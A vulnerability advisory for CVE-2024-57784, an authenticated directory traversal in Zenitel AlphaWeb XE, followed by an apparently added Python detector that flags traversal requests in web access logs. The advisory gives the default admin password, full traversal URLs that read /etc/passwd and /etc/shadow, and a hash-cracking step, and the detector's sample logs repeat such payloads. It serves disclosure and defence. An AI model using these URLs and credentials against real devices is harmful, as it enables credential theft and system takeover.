Created January 16, 2025 10:37
CVE ID: CVE-2024-57784
Vulnerability Title: Authenticated Directory Traversal Vulnerability on Zenitel AlphaWeb XE - Version 11.2.3.10
Description:
An issue in the component /php/script_uploads.php of Zenitel AlphaWebXE v11.2.3.10 allows attackers to execute a directory traversal.
Vulnerability Type:
Directory Traversal
Vendor of Product:
Zenitel
Affected Product Code Base:
Zenitel AlphaWeb XE - Version 11.2.3.10
Affected Component:
Affected URL: http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/passwd
Attack Type:
Remote
Impact Information Disclosure:
true
Attack Vectors:
Steps to Reproduce:
Step 1: Authenticate to the Zenitel AlphaWeb XE web application, Version 11.2.3.10 (the default username 'admin' and password 'alphaadmin' can be used for authentication).
Step 2: After logging in to the Zenitel AlphaWeb XE web application, navigate to the URL "http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/passwd"; the /etc/passwd file is returned successfully.
Step 3: The /etc/shadow file, which contains the local user password hashes, can also be accessed by using the URL "http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/shadow".
Step 4: These password hashes can then be subjected to cracking attempts in order to access the Linux system.
Reference:
https://www.zenitel.com/
Discoverer:
Safvan Parakkal from MoroHub
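
A defender-side check for the request pattern listed under Affected Component, as an added example that is not part of the original advisory or of Zenitel's code: it scans web access logs for get_file requests to /php/script_uploads.php whose file parameter resolves outside its base directory. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ENDPOINT = "/php/script_uploads.php"  # component named in the advisory


def escapes_base(value: str) -> bool:
    """True if a file parameter is absolute or climbs above its base directory."""
    # Decode repeatedly so double-encoded separators are also normalised.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")
    if value.startswith("/") or "\x00" in value:
        return True
    # After normalisation, a leading ".." means the path left the base directory.
    norm = posixpath.normpath(value)
    return norm == ".." or norm.startswith("../")


def suspicious_requests(lines):
    """Return (client_ip, file_value) for get_file requests that traverse directories."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path != ENDPOINT or "get_file" not in params.get("action", []):
            continue
        for value in params.get("file", []):  # parse_qs has already decoded once
            if escapes_base(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jan/2025:10:00:01 +0000] "GET /php/script_uploads.php?action=get_file&file=report.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [16/Jan/2025:10:00:05 +0000] "GET /php/script_uploads.php?action=get_file&file=../../../../etc/passwd HTTP/1.1" 200 1480',
    '198.51.100.7 - - [16/Jan/2025:10:00:09 +0000] "GET /php/script_uploads.php?action=get_file&file=..%252f..%252fetc%252fshadow HTTP/1.1" 200 900',
    '203.0.113.5 - - [16/Jan/2025:10:00:12 +0000] "GET /index.php?file=../x HTTP/1.1" 404 0',
]
```

Hits that returned HTTP 200 are the ones to prioritise for credential rotation, since the advisory notes that /etc/shadow is readable through the same parameter.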